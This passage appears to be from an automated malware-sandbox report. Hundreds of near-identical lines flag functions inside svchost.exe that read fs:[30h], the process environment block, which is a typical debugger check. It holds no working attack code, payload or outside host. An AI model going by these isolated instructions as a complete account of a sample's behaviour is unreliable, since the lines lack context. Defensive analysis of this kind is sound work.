Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]	1_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B8243 mov eax, dword ptr fs:[00000030h]	1_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B8243 mov ecx, dword ptr fs:[00000030h]	1_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0330625D mov eax, dword ptr fs:[00000030h]	1_2_0330625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322A250 mov eax, dword ptr fs:[00000030h]	1_2_0322A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03236259 mov eax, dword ptr fs:[00000030h]	1_2_03236259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]	1_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]	1_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]	1_2_032402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]	1_2_032402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]	1_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C62A0 mov ecx, dword ptr fs:[00000030h]	1_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]	1_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]	1_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]	1_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]	1_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]	1_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]	1_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]	1_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]	1_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]	1_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]	1_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]	1_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h]	1_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033062D6 mov eax, dword ptr fs:[00000030h]	1_2_033062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03260124 mov eax, dword ptr fs:[00000030h]	1_2_03260124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]	1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]	1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]	1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]	1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]	1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]	1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]	1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]	1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h]	1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h]	1_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DA118 mov ecx, dword ptr fs:[00000030h]	1_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]	1_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]	1_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h]	1_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F0115 mov eax, dword ptr fs:[00000030h]	1_2_032F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304164 mov eax, dword ptr fs:[00000030h]	1_2_03304164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304164 mov eax, dword ptr fs:[00000030h]	1_2_03304164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]	1_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]	1_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C4144 mov ecx, dword ptr fs:[00000030h]	1_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]	1_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h]	1_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322C156 mov eax, dword ptr fs:[00000030h]	1_2_0322C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C8158 mov eax, dword ptr fs:[00000030h]	1_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03236154 mov eax, dword ptr fs:[00000030h]	1_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03236154 mov eax, dword ptr fs:[00000030h]	1_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03270185 mov eax, dword ptr fs:[00000030h]	1_2_03270185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h]	1_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h]	1_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h]	1_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h]	1_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]	1_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]	1_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]	1_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B019F mov eax, dword ptr fs:[00000030h]	1_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]	1_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]	1_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h]	1_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033061E5 mov eax, dword ptr fs:[00000030h]	1_2_033061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032601F8 mov eax, dword ptr fs:[00000030h]	1_2_032601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h]	1_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h]	1_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322A020 mov eax, dword ptr fs:[00000030h]	1_2_0322A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322C020 mov eax, dword ptr fs:[00000030h]	1_2_0322C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C6030 mov eax, dword ptr fs:[00000030h]	1_2_032C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B4000 mov ecx, dword ptr fs:[00000030h]	1_2_032B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]	1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]	1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]	1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]	1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]	1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]	1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]	1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h]	1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]	1_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]	1_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]	1_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]	1_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325C073 mov eax, dword ptr fs:[00000030h]	1_2_0325C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03232050 mov eax, dword ptr fs:[00000030h]	1_2_03232050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B6050 mov eax, dword ptr fs:[00000030h]	1_2_032B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032280A0 mov eax, dword ptr fs:[00000030h]	1_2_032280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C80A8 mov eax, dword ptr fs:[00000030h]	1_2_032C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F60B8 mov eax, dword ptr fs:[00000030h]	1_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F60B8 mov ecx, dword ptr fs:[00000030h]	1_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323208A mov eax, dword ptr fs:[00000030h]	1_2_0323208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_0322A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032380E9 mov eax, dword ptr fs:[00000030h]	1_2_032380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B60E0 mov eax, dword ptr fs:[00000030h]	1_2_032B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322C0F0 mov eax, dword ptr fs:[00000030h]	1_2_0322C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032720F0 mov ecx, dword ptr fs:[00000030h]	1_2_032720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B20DE mov eax, dword ptr fs:[00000030h]	1_2_032B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h]	1_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h]	1_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326273C mov eax, dword ptr fs:[00000030h]	1_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326273C mov ecx, dword ptr fs:[00000030h]	1_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326273C mov eax, dword ptr fs:[00000030h]	1_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AC730 mov eax, dword ptr fs:[00000030h]	1_2_032AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326C700 mov eax, dword ptr fs:[00000030h]	1_2_0326C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03230710 mov eax, dword ptr fs:[00000030h]	1_2_03230710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03260710 mov eax, dword ptr fs:[00000030h]	1_2_03260710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03238770 mov eax, dword ptr fs:[00000030h]	1_2_03238770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326674D mov esi, dword ptr fs:[00000030h]	1_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326674D mov eax, dword ptr fs:[00000030h]	1_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326674D mov eax, dword ptr fs:[00000030h]	1_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03230750 mov eax, dword ptr fs:[00000030h]	1_2_03230750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BE75D mov eax, dword ptr fs:[00000030h]	1_2_032BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272750 mov eax, dword ptr fs:[00000030h]	1_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272750 mov eax, dword ptr fs:[00000030h]	1_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B4755 mov eax, dword ptr fs:[00000030h]	1_2_032B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032307AF mov eax, dword ptr fs:[00000030h]	1_2_032307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E47A0 mov eax, dword ptr fs:[00000030h]	1_2_032E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D678E mov eax, dword ptr fs:[00000030h]	1_2_032D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]	1_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]	1_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]	1_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BE7E1 mov eax, dword ptr fs:[00000030h]	1_2_032BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032347FB mov eax, dword ptr fs:[00000030h]	1_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032347FB mov eax, dword ptr fs:[00000030h]	1_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323C7C0 mov eax, dword ptr fs:[00000030h]	1_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B07C3 mov eax, dword ptr fs:[00000030h]	1_2_032B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324E627 mov eax, dword ptr fs:[00000030h]	1_2_0324E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03266620 mov eax, dword ptr fs:[00000030h]	1_2_03266620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03268620 mov eax, dword ptr fs:[00000030h]	1_2_03268620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323262C mov eax, dword ptr fs:[00000030h]	1_2_0323262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE609 mov eax, dword ptr fs:[00000030h]	1_2_032AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]	1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]	1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]	1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]	1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]	1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]	1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]	1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272619 mov eax, dword ptr fs:[00000030h]	1_2_03272619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F866E mov eax, dword ptr fs:[00000030h]	1_2_032F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F866E mov eax, dword ptr fs:[00000030h]	1_2_032F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326A660 mov eax, dword ptr fs:[00000030h]	1_2_0326A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326A660 mov eax, dword ptr fs:[00000030h]	1_2_0326A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03262674 mov eax, dword ptr fs:[00000030h]	1_2_03262674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324C640 mov eax, dword ptr fs:[00000030h]	1_2_0324C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326C6A6 mov eax, dword ptr fs:[00000030h]	1_2_0326C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032666B0 mov eax, dword ptr fs:[00000030h]	1_2_032666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03234690 mov eax, dword ptr fs:[00000030h]	1_2_03234690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03234690 mov eax, dword ptr fs:[00000030h]	1_2_03234690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B06F1 mov eax, dword ptr fs:[00000030h]	1_2_032B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B06F1 mov eax, dword ptr fs:[00000030h]	1_2_032B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_0326A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326A6C7 mov eax, dword ptr fs:[00000030h]	1_2_0326A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]	1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]	1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]	1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]	1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]	1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]	1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]	1_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]	1_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]	1_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]	1_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]	1_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C6500 mov eax, dword ptr fs:[00000030h]	1_2_032C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]	1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]	1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]	1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]	1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]	1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]	1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]	1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]	1_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]	1_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]	1_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03238550 mov eax, dword ptr fs:[00000030h]	1_2_03238550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03238550 mov eax, dword ptr fs:[00000030h]	1_2_03238550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]	1_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]	1_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]	1_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032545B1 mov eax, dword ptr fs:[00000030h]	1_2_032545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032545B1 mov eax, dword ptr fs:[00000030h]	1_2_032545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03232582 mov eax, dword ptr fs:[00000030h]	1_2_03232582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03232582 mov ecx, dword ptr fs:[00000030h]	1_2_03232582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03264588 mov eax, dword ptr fs:[00000030h]	1_2_03264588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E59C mov eax, dword ptr fs:[00000030h]	1_2_0326E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032325E0 mov eax, dword ptr fs:[00000030h]	1_2_032325E0
